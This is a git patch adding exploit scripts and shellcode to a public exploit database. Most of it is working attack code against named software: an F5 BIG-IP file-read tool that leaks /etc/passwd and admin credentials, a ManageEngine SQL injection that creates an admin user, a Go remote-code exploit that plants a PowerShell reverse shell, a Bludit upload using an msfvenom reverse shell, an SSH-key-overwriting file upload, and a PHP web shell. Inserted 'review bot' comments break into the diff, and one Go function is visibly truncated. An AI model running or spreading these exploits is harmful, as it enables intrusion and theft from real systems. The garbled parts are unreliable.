From e46d9f65ff00b5da8af2bf715f59767ae265523c Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Mon, 27 Jul 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-07-27 32 changes to exploits/shellcodes Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite) Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter) docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) Bludit 3.9.2 - Directory Traversal LibreHealth 2.0.0 - Authenticated Remote Code Execution Online Course Registration 1.0 - Unauthenticated Remote Code Execution elaniin CMS - Authentication Bypass Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting Bio Star 2.8.2 - Local File Inclusion Webtareas 2.1p - Arbitrary File Upload (Authenticated) F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) Socket.io-file 2.0.31 - Arbitrary File Upload pfSense 2.4.4-p3 - Cross-Site Request Forgery Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting Rails 5.0.1 - Remote Code Execution Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes) Linux/x86 - Egghunter(0x50905090) + sigaction + 
execve(/bin/sh) Shellcode (35 bytes) Windows/x86 - Download using mshta.exe Shellcode (100 bytes) --- exploits/hardware/webapps/48694.txt | 62 ++++++ exploits/hardware/webapps/48711.py | 128 +++++++++++++ exploits/java/webapps/48692.py | 95 ++++++++++ exploits/multiple/webapps/48693.go | 281 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48701.txt | 132 +++++++++++++ exploits/multiple/webapps/48708.txt | 35 ++++ exploits/multiple/webapps/48712.txt | 30 +++ exploits/multiple/webapps/48713.txt | 59 ++++++ exploits/php/webapps/48636.txt | 18 +- exploits/php/webapps/48690.txt | 16 ++ exploits/php/webapps/48698.txt | 40 ++++ exploits/php/webapps/48699.sh | 127 +++++++++++++ exploits/php/webapps/48702.txt | 130 +++++++++++++ exploits/php/webapps/48704.py | 113 +++++++++++ exploits/php/webapps/48705.txt | 29 +++ exploits/php/webapps/48706.txt | 76 ++++++++ exploits/php/webapps/48707.txt | 118 ++++++++++++ exploits/php/webapps/48709.txt | 51 +++++ exploits/php/webapps/48714.txt | 40 ++++ exploits/php/webapps/48715.txt | 40 ++++ exploits/ruby/webapps/48716.rb | 32 ++++ exploits/windows/dos/48697.py | 33 ++++ exploits/windows/local/48687.py | 66 +++++++ exploits/windows/local/48688.py | 98 ++++++++++ exploits/windows/local/48689.py | 100 ++++++++++ exploits/windows/local/48691.py | 102 ++++++++++ exploits/windows/local/48695.py | 75 ++++++++ exploits/windows/local/48696.py | 62 ++++++ exploits/windows/local/48719.py | 99 ++++++++++ files_exploits.csv | 28 +++ files_shellcodes.csv | 3 + shellcodes/linux_x86/48592.c | 79 ++++++++ shellcodes/linux_x86/48703.c | 75 ++++++++ shellcodes/windows_x86/48718.c | 69 +++++++ 34 files changed, 2532 insertions(+), 9 deletions(-) create mode 100644 exploits/hardware/webapps/48694.txt create mode 100755 exploits/hardware/webapps/48711.py create mode 100755 exploits/java/webapps/48692.py create mode 100755 exploits/multiple/webapps/48693.go create mode 100644 exploits/multiple/webapps/48701.txt create mode 100644 
exploits/multiple/webapps/48708.txt create mode 100644 exploits/multiple/webapps/48712.txt create mode 100644 exploits/multiple/webapps/48713.txt create mode 100644 exploits/php/webapps/48690.txt create mode 100644 exploits/php/webapps/48698.txt create mode 100755 exploits/php/webapps/48699.sh create mode 100644 exploits/php/webapps/48702.txt create mode 100755 exploits/php/webapps/48704.py create mode 100644 exploits/php/webapps/48705.txt create mode 100644 exploits/php/webapps/48706.txt create mode 100644 exploits/php/webapps/48707.txt create mode 100644 exploits/php/webapps/48709.txt create mode 100644 exploits/php/webapps/48714.txt create mode 100644 exploits/php/webapps/48715.txt create mode 100755 exploits/ruby/webapps/48716.rb create mode 100755 exploits/windows/dos/48697.py create mode 100755 exploits/windows/local/48687.py create mode 100755 exploits/windows/local/48688.py create mode 100755 exploits/windows/local/48689.py create mode 100755 exploits/windows/local/48691.py create mode 100755 exploits/windows/local/48695.py create mode 100755 exploits/windows/local/48696.py create mode 100755 exploits/windows/local/48719.py create mode 100644 shellcodes/linux_x86/48592.c create mode 100644 shellcodes/linux_x86/48703.c create mode 100644 shellcodes/windows_x86/48718.c diff --git a/exploits/hardware/webapps/48694.txt b/exploits/hardware/webapps/48694.txt new file mode 100644 index 000000000..268a0eb4e --- /dev/null +++ b/exploits/hardware/webapps/48694.txt @@ -0,0 +1,62 @@ +# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-07-23 +# Author: LiquidWorm +# Product web page: http://www.medivision.co.kr +# CVE: N/A + + + + + + +
+ + + + + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48711.py b/exploits/hardware/webapps/48711.py
new file mode 100755
index 000000000..3a34138b1
--- /dev/null
+++ b/exploits/hardware/webapps/48711.py
@@ -0,0 +1,128 @@ +# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion +# Date: 2019-08-17 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: <= 13.1.3 +# Tested on: BIG-IP 13.1.3 Build 0.0.6 +# CVE : CVE-2020-5902 + +#!/usr/bin/env python + +import requests +import sys +import time +import urllib3 +import json +urllib3.disable_warnings() + +global target + +def checkTarget(): + + r = requests.head(target + "/tmui/login.jsp", verify=False) + if(r.status_code == 200): + return True + else: + return False + +def checkVuln(): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0): + return True + else: + return False + + else: + return False + +def leakPasswd(): + print("[+] Leaking /etc/passwd from server") + time.sleep(2) + exploit('/etc/passwd') + + +def leakHosts(): + print("[+] Leaking /etc/hosts from server") + time.sleep(2) + exploit('/etc/hosts') + +def leakLicence(): + + print("[+] Leaking /config/bigip.license from server") + time.sleep(2) + exploit('/config/bigip.license') + +def leakAdmin(): + + print("[+] Leaking admin credentials from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0 ): + print(data['output']) + else: + print("[X] Admin credentials not found") + else: + print("[X] Fail to read file") + + +def exploit(file): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + file, verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + print(data['output']) + else: + print("[X] Fail to read file") + +def memoryLeak(): + print("[!] 
Leaking tomcat process from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline", verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + if(len(data['output'])>0): + print("Command: " + data['output']) + +def main(host): + + print("[+] Check target...") + global target + target = "https://" + host + + check = checkTarget() + if(check): + print("[~] Target is available") + + vuln = checkVuln() + if(vuln): + print("[+] Target is vulnerable!") + + time.sleep(1) + print("[~] Leak information from target!") + time.sleep(1) + leakPasswd() + leakHosts() + leakLicence() + leakAdmin() + memoryLeak() + else: + print("[X] Target is't vulnerable") + + else: + print("[x] Target is unavailable") + + +if __name__ == "__main__": + + if(len(sys.argv) < 2): + print("Use: python {} ip/dns".format(sys.argv[0])) + else: + host = sys.argv[1] + main(host) \ No newline at end of file diff --git a/exploits/java/webapps/48692.py b/exploits/java/webapps/48692.py new file mode 100755 index 000000000..500ec8575 --- /dev/null +++ b/exploits/java/webapps/48692.py 
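Review bot: The `#!/usr/bin/env python` line in 48711.py sits below the seven-line header comment, so it is not an interpreter directive; running the file directly falls back to the invoking shell rather than Python. Either keep the shebang on line 1 above the header or state the interpreter in the header, e.g. `# Run with: python 48711.py ip/dns` to match the usage string the script prints. The same header-above-shebang layout appears in 48692.py, 48701.txt, 48708.txt and 48713.txt in this commit. The header's `# Date: 2019-08-17` also predates the CVE-2020-5902 identifier it cites, which looks like a typo worth confirming with the author.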
@@ -0,0 +1,95 @@ +# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection +# Google Dork: intitle:"Applications Manager Login Screen" +# Date: 2020-07-23 +# Exploit Author: aldorm +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: +# Version: 12 and 13 before Build 13200 +# Tested on: Windows +# CVE : 2016-9488 + +#!/usr/bin/env python2 + +# App: ManageEngine Applications Manager +# Versions: 12 and 13 before build 13200 +# CVE: CVE-2016-9488 +# Vuln Type: SQL Injection +# CVSSv3: 9.8 +# +# PoC Autor: aldorm +# Release date: 23-07-2020 + +# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker +# [*] Extracting all users: +# admin:21232f297a57a5a743894a0e4a801fc3 +# reportadmin:21232f297a57a5a743894a0e4a801fc3 +# systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3 +# [*] Creating new user: +# User: hacker +# Password: admin +# [*] Verifing created user... +# Success. + + +import sys +import requests +import urllib3 +import json + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +target = 'localhost' + +def get_userpassword(): + sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + j = json.loads(r.text) + return j + +def create_user(): + sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, 
verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + return + + +def main (): + if not len(sys.argv) > 2: + print "Usage %s [--create-user-hacker]" % sys.argv[0] + print "e.g. %s manageengine 8443 " % sys.argv[0] + sys.exit(1) + + global target + global port + target=sys.argv[1] + port=sys.argv[2] + + print "[*] Extracting all users:" + j = get_userpassword() + for user in j["0"]: + print "\t %s" % user[1] + + + if len(sys.argv) == 4 and sys.argv[3] == '--create-user-hacker': + print "[*] Creating new user: \n\tUser: hacker \n\tPassword: admin" + create_user() + print "[*] Verifing created user..." + + j = get_userpassword() + for user in j["0"]: + if user[1] == "hacker:21232f297a57a5a743894a0e4a801fc3": + print "Success." + return + print "User not created." + + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48693.go b/exploits/multiple/webapps/48693.go new file mode 100755 index 000000000..523ea733e --- /dev/null +++ b/exploits/multiple/webapps/48693.go 
@@ -0,0 +1,281 @@ +# Exploit Title: INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution +# Date: 2020-07-23 +# Exploit Author: Patrick Hener, SySS GmbH +# Many credits go to Dr. Benjamin Heß, SySS GmbH for helping with php oddities and the powershell payload +# Advisory: SYSS-2020-028 (https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-028.txt) +# Vendor Homepage: https://www.inneo.co.uk/en/home.html +# Version: Startup TOOLS 2017/2018 +# Tested on: Windows 10 x64 +# CVE : CVE-2020-15492 + +/* This exploit was written by Patrick Hener, SySS GmbH +*/ + +package main + +import ( + "encoding/base64" + "fmt" + _ "fmt" + "io" + "io/ioutil" + "log" + "net" + "net/http" + "net/url" + "os" + "regexp" + "strconv" + "strings" + + "golang.org/x/text/encoding/unicode" +) + +type progress struct { + bytes uint64 +} + +func usage() { + fmt.Printf("Usage: %s lhost[192.168.x.x] lport[4444] url[http://ip:85] installDir[PROGRA~2/stools] \n\n", os.Args[0]) + os.Exit(2) +} + +func readFile(target string, traversal string, path string) (bool, string) { + success := true + request := fmt.Sprintf("%s%s%s", target, traversal, path) + resp, err := http.Get(request) + if err != nil { + fmt.Println(err) + } + if resp.Status != "200 OK" { + success = false + } + + defer resp.Body.Close() + body, err := ioutil.ReadAll(resp.Body) + if err != nil { + fmt.Println(err) + } + + return success, string(body) +} + +func triggerFile(target string, traversal string, path string) { + request := fmt.Sprintf("%s%s%s", target, traversal, path) + _, _ = http.Get(request) +} + +func poison(target string, traversal string, path string) (bool, string) { + success := true + request := fmt.Sprintf("%s%s%s", target, traversal, path) + resp, err := http.Get(request) + if err != nil { + fmt.Println(err) + os.Exit(2) + } + if resp.Status != "404 Not Found" { + success = false + } + + defer resp.Body.Close() + + fmt.Printf("[*] Poisoned: %s\n", path) + + body, err := 
ioutil.ReadAll(resp.Body) + if err != nil { + fmt.Println(err) + } + + return success, string(body) +} + +func parseHostname(body string) string { + re := regexp.MustCompile("Service hostname:?.*") + hostnameRaw := re.FindAllString(body, -1) + hostnameSplit := strings.Split(hostnameRaw[0], ":") + hostnameTrimmed := strings.TrimSpace(hostnameSplit[1]) + hostnameNoNewline := strings.Replace(hostnameTrimmed, "\n", "", -1) + + return hostnameNoNewline +} + +func customEscape(sequence string) string { + output := url.PathEscape(sequence) + output = strings.Replace(output, "+", "%20", -1) + output = strings.Replace(output, "=", "%3D", -1) + + return output +} + +func payloadEscape(sequence string) string { + output := url.PathEscape(sequence) + output = strings.Replace(output, "=", "%3D", -1) + + return output +} + +func transferStreams(con net.Conn) { + c := make(chan progress) + + // Read from Reader and write to Writer until EOF + copy := func(r io.ReadCloser, w io.WriteCloser) { + defer func() { + r.Close() + w.Close() + }() + n, err := io.Copy(w, r) + if err != nil { + fmt.Printf("[%s]: ERROR: %s\n", con.RemoteAddr(), err) + } + c <- progress{bytes: uint64(n)} + } + + go copy(con, os.Stdout) + go copy(os.Stdin, con) + + p := <-c + fmt.Printf("[*] [%s]: Connection has been closed by remote peer, %d bytes has been received\n", con.RemoteAddr(), p.bytes) + p = <-c + fmt.Printf("[*] [%s]: Local peer has been stopped, %d bytes has been sent\n", con.RemoteAddr(), p.bytes) +} + +func startServer(addr string) { + ln, err := net.Listen("tcp", addr) + if err != nil { + log.Fatalln(err) + } + fmt.Printf("[+] Now listening on %s\n", addr) + con, err := ln.Accept() + if err != nil { + log.Fatalln(err) + } + fmt.Printf("[+] [%s]: Connection has been opened. Press 'RETURN' once to start. 
Enjoy your shell, good sir.\n", con.RemoteAddr()) + transferStreams(con) +} + +func stage1(target string, traversal string, installDir string) string { + fmt.Printf("[*] Attacking target %s with assumed install path %s\n", target, installDir) + fmt.Printf("[*] Trying to read 'sut_server.log' to receive hostname of target at %s%s%s/software/LOG/sut_server.log\n", target, traversal, installDir) + path := fmt.Sprintf("%s/software/LOG/sut_server.log", installDir) + success, response := readFile(target, traversal, path) + if !success { + fmt.Printf("[-] It looks like %s%s%s is not there. Provide install_dir to try via args.\n", target, traversal, installDir) + os.Exit(2) + } + hostname := parseHostname(response) + + return hostname +} + +func stage2(target string, traversal string, installDir string, payloadFinal string) { + /* Stage 2 - poison log with php payload + Special about that is the length of payload junk has max restriction of about 200 characters + Thus we are splitting up the payload escaping the trash we don't need like + the 'n' is nesessary to escape DRIVE:\ which will be DRIVE:\n then + + */ + fmt.Println("[*] Poisoning Log with payload") + /* Start of the php code */ + start := customEscape("") + success, _ = poison(target, traversal, end) + if !success { + fmt.Println("Poisoning failed. 
Exiting") + os.Exit(2) + } +} + +func stage3(target string, traversal string, installDir string, hostname string) { + logFile := fmt.Sprintf("%s%s%s/software/LOG/sut_server_%s.log\\0.php", target, traversal, installDir, hostname) + fmt.Printf("[*] Triggering inclusion of %s\n", logFile) + triggerFile(target, traversal, logFile) +} + +func stage4(lhost string, lport int) { + /* Listen for socket connection */ + addr := fmt.Sprintf("%s:%d", lhost, lport) + fmt.Printf("[*] Starting reverse listener at %s\n", addr) + startServer(addr) +} + +func main() { + if len(os.Args) < 4 { + usage() + } + + lhost := os.Args[1] + lport, err := strconv.Atoi(os.Args[2]) + if err != nil { + fmt.Println("lport has to be numeric") + os.Exit(2) + } + target := os.Args[3] + var installDir string + if len(os.Args) == 4 { + installDir = "PROGRA~2/stools" + } else { + installDir = os.Args[4] + } + + /* Payload definition */ + payload := fmt.Sprintf("$client = New-Object System.Net.Sockets.TCPClient('%s',%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()", lhost, lport) + /* Convert to base64 UTF-16LE */ + encoder := unicode.UTF16(unicode.LittleEndian, unicode.IgnoreBOM).NewEncoder() + payloadEncoded, _ := encoder.String(payload) + payloadEncodedString := base64.StdEncoding.EncodeToString([]byte(payloadEncoded)) + /* In webshell we would issue: powershell.exe -exec bypass -EncodedCommand */ + payloadFinal := fmt.Sprintf("powershell.exe -exec bypass -EncodedCommand %s", payloadEncodedString) + + /* Traversal to root - default depth would be 4 */ + traversal := "/../../../../../../../../../../" + + /* stage 1 - get 
hostname */ + hostname := stage1(target, traversal, installDir) + fmt.Printf("[+] Hostname of target is: %s\n", hostname) + /* stage 2 - poisoning */ + stage2(target, traversal, installDir, payloadFinal) + /* stage 3 - trigger */ + go stage3(target, traversal, installDir, hostname) + /* stage4 - start listener */ + stage4(lhost, lport) +} \ No newline at end of file diff --git a/exploits/multiple/webapps/48701.txt b/exploits/multiple/webapps/48701.txt new file mode 100644 index 000000000..fd1db8862 --- /dev/null +++ b/exploits/multiple/webapps/48701.txt 
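Review bot: The nine header lines at the top of 48693.go start with `#`, which Go does not accept as a comment syntax, so the file as committed does not build until they are rewritten as `//` comments (the `/* ... */` block that follows already shows the intended style). Separately, `readFile` only prints a transport error and then reads `resp.Status`, so a refused connection dereferences a nil response and panics; returning early with `if err != nil { fmt.Println(err); return false, "" }` makes the failure path match the `success == false` contract that `stage1` already checks. The `_ "fmt"` blank import beside the regular `"fmt"` import is redundant and can be dropped. The body of `stage2` looks truncated in this rendering (`success, _ = poison(...)` assigns to a variable never declared), presumably extraction damage rather than the committed code, but it is worth verifying against the raw file.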
@@ -0,0 +1,132 @@ +# Title: Bludit 3.9.2 - Directory Traversal +# Author: James Green +# Date: 2020-07-20 +# Vendor Homepage: https://www.bludit.com +# Software Link: https://github.com/bludit/bludit +# Version: 3.9.2 +# Tested on: Linux Ubuntu 19.10 Eoan +# CVE: CVE-2019-16113 +# +# Special Thanks to Ali Faraj (@InfoSecAli) and authors of MSF Module https://www.exploit-db.com/exploits/47699 + +#### USAGE #### +# 1. Create payloads: .png with PHP payload and the .htaccess to treat .pngs like PHP +# 2. Change hardcoded values: URL is your target webapp, username and password is admin creds to get to the admin dir +# 3. Run the exploit +# 4. Start a listener to match your payload: `nc -nlvp 53`, meterpreter multi handler, etc +# 5. Visit your target web app and open the evil picture: visit url + /bl-content/tmp/temp/evil.png + +#!/usr/bin/env python3 + +import requests +import re +import argparse +import random +import string +import base64 +from requests.exceptions import Timeout + +url = 'http://127.0.0.1' # CHANGE ME +username = 'James' # CHANGE ME +password = 'Summer2020' # CHANGE ME + +# msfvenom -p php/reverse_php LHOST=127.0.0.1 LPORT=53 -f raw -b '"' > evil.png +# echo -e " evil.png +payload = 'evil.png' # CREATE ME + +# echo "RewriteEngine off" > .htaccess +# echo "AddType application/x-httpd-php .png" >> .htaccess +payload2 = '.htaccess' # CREATE ME + +def login(url,username,password): + """ Log in with provided admin creds, grab the cookie once authenticated """ + + session = requests.Session() + login_page = session.get(url + "/admin/") + csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', + login_page.text + ).group(1) + cookie = ((login_page.headers["Set-Cookie"]).split(";")[0].split("=")[1]) + data = {"save":"", + "password":password, + "tokenCSRF":csrf_token, + "username":username} + headers = {"Origin":url, + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Upgrade-Insecure-Requests":"1", + 
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer": url + "/admin/", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + "Content-Type":"application/x-www-form-urlencoded" + } + cookies = {"BLUDIT-KEY":cookie} + response = session.post(url + "/admin/", + data=data, + headers=headers, + cookies=cookies, + allow_redirects = False + ) + + print("cookie: " + cookie) + return cookie + +def get_csrf_token(url,cookie): + """ Grab the CSRF token from an authed session """ + + session = requests.Session() + headers = {"Origin":url, + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Upgrade-Insecure-Requests":"1", + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer":url + "/admin/", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":cookie} + response = session.get(url + "/admin/dashboard", + headers=headers, + cookies=cookies + ) + csrf_token = response.text.split('var tokenCSRF = "')[1].split('"')[0] + + print("csrf_token: " + csrf_token) + return csrf_token + +def upload_evil_image(url, cookie, csrf_token, payload, override_uuid=False): + """ Upload files required for to execute PHP from malicious image files. Payload and .htaccess """ + + session = requests.Session() + files= {"images[]": (payload, + open(payload, "rb"), + "multipart/form-data", + {"Content-Type": "image/png", "filename":payload} + )} + if override_uuid: + data = {"uuid": "../../tmp/temp", + "tokenCSRF":csrf_token} + else: + # On the vuln app, this line occurs first: + # Filesystem::mv($_FILES['images']['tmp_name'][$uuid], PATH_TMP.$filename); + # Even though there is a file extension check, it won't really stop us + # from uploading the .htaccess file. 
+ data = {"tokenCSRF":csrf_token} + headers = {"Origin":url, + "Accept":"*/*", + "X-Requested-With":"XMLHttpRequest", + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Connection":"close", + "Referer":url + "/admin/new-content", + "Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding":"gzip, deflate", + } + cookies = {"BLUDIT-KEY":cookie} + response = session.post(url + "/admin/ajax/upload-images", data=data, files=files, headers=headers, cookies=cookies) + print("Uploading payload: " + payload) + +if __name__ == "__main__": + cookie = login(url, username, password) + token = get_csrf_token(url, cookie) + upload_evil_image(url, cookie, token, payload, True) + upload_evil_image(url, cookie, token, payload2) \ No newline at end of file diff --git a/exploits/multiple/webapps/48708.txt b/exploits/multiple/webapps/48708.txt new file mode 100644 index 000000000..27d0aa4a3 --- /dev/null +++ b/exploits/multiple/webapps/48708.txt 
@@ -0,0 +1,35 @@ +# Exploit Title: Bio Star 2.8.2 - Local File Inclusion +# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) +# Google Dork: N/A +# Date of Exploit Release: 2020-07-13 +# Exploit Author: SITE Team +# Vendor Homepage: https://www.supremainc.com/en/main.asp +# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp +# Version: Bio Star 2, Video Extension up to version 2.8.2 +# Tested on: Windows +# CVE : CVE-2020-15050 + + +#!/bin/bash + +# Exploit Title: Video Extension of Bio Star up to 2.8.1 Local File Inclusion Exploit +# Authors: SITE Team (Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi) +# Google Dork: N/A +# Date of Exploit Release: 13/7/2020 +# Exploit Author: SITE Team +# Vendor Homepage: https://www.supremainc.com/en/main.asp +# Software Link: https://www.supremainc.com/en/support/biostar-2-pakage.asp +# Version: Bio Star 2, Video Extension up to version 2.8.1 +# Tested on: Windows +# CVE : CVE-2020-15050 + +echo "*********** SITE TEAM *********************" +echo "*********** Video Extension of Bio Star 2 Local File Inclusion Exploit ***********" +echo "*********** Rian Saaty, Bashaer AlHarthy, Safeyah Alhazmi *********************" + + if [ -z "$*" ]; then echo "Usage Example: ./exploit.sh https://website/ ../../../../../../../../../../../../windows/win.ini" +echo "*******************************************" +else +args=("$@") +curl -X GET --path-as-is -k ${args[0]}${args[1]} +fi \ No newline at end of file diff --git a/exploits/multiple/webapps/48712.txt b/exploits/multiple/webapps/48712.txt new file mode 100644 index 000000000..3ad3f4e44 --- /dev/null +++ b/exploits/multiple/webapps/48712.txt 
@@ -0,0 +1,30 @@ +# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication) +# Google Dork: https://www.shodan.io/search?query=sickbeard +# Date: 2020-06-06 +# Exploit Author: bdrake +# Vendor Homepage: https://sickbeard.com/ +# Software Link: https://github.com/midgetspy/Sick-Beard +# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121 +# Tested on: Fedora 32 +# CVE : NA + + + + +
+ + + + + + + +
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/48713.txt b/exploits/multiple/webapps/48713.txt
new file mode 100644
index 000000000..d0b98b609
--- /dev/null
+++ b/exploits/multiple/webapps/48713.txt
@@ -0,0 +1,59 @@ +# Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload +# Date: 2020-07-02 +# Exploit Author: Cr0wTom +# Vendor Homepage: https://www.npmjs.com/package/socket.io-file +# Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31 +# Version: <= v2.0.31 +# Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0 +# CVE: - + +# Requirements: pip install socketIO-client-nexus==0.7.6 + +#!/usr/bin/env python + +import sys +import json +import os +from socketIO_client_nexus import SocketIO, LoggingNamespace + +def file_creation(RHOST, RPORT): + print ('Initiating connection...') + with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO: + + print ('Creating file...') + + # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately + # Change the "name" option if you want to create an other file in an different path of the system + socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}}) + + # Example for server running with root access: + # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}}) + + print ('Writing data to file...') + + # Add the data you want to get written to the file + data = "Exploited by Cr0wTom" + json_string = json.dumps(data) + socketIO.once("socket.io-file::request::u_0", on_aaa_response) + socketIO.emit("socket.io-file::stream::u_0", json_string) + +def on_aaa_response(*args): + print('on_aaa_response', args) + +def print_usage(): + print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') + print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') + print ('Usage: python3 exploit.py ') + print ('RHOST The target host IP address or domain.') + print ('RPORT The target host port number of the nodejs server.') + +if __name__ == '__main__': + + # ensure we 
have at least an IP and Port + if len(sys.argv) < 3: + print_usage() + sys.exit(1) + + print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality') + print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n') + file_creation(sys.argv[1], sys.argv[2]) \ No newline at end of file diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt index 8dd2f6607..35326f319 100644 --- a/exploits/php/webapps/48636.txt +++ b/exploits/php/webapps/48636.txt @@ -7,18 +7,17 @@ 1- Go to following url. >> http://(HOST)/cms/ 2- Default username and password is admin:admin. We must know login credentials. -3- Go "Filemanager" and press "Upload file" button. -4- Choose your php webshell script and upload it. - -((Example PHP Web Shell Code)) -"; system($_GET['cmd']); ?> +3- Go to "Filemanager" and press "Upload file" button. +4- Choose your php web shell script and upload it. + +PHP Web Shell Code == 5- You can find uploaded file there. >> http://(HOST)/media/(FILE-NAME).php -6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=whoami +6- We can execute a command now. >> http://(HOST)/media/(FILE-NAME).php?cmd=id (( REQUEST )) -GET 